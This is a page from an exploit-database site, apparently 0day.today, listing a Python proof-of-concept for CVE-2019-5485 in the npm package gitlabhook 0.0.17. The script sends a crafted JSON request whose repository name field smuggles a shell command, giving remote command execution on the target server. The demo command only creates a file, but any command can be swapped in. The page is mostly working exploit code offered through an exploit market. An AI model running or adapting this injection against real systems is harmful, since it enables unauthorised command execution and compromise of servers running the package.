[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

NPMJS gitlabhook 0.0.17 - (repository) Remote Command Execution Exploit

Author
Semen Alexandrovich Lyhin
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-33279
Category
web applications
Date add
26-09-2019
CVE
CVE-2019-5485
Platform
jsp
# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
# Version: 0.0.17
# Tested on: Kali Linux 2, Windows 10. 
# CVE : CVE-2019-5485

#!/usr/bin/python

import requests

target = "http://TARGET:3420"
cmd = r"touch /tmp/poc.txt"
json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
r = requests.post(target, json)

print "Done."

#  0day.today [2024-11-16]  #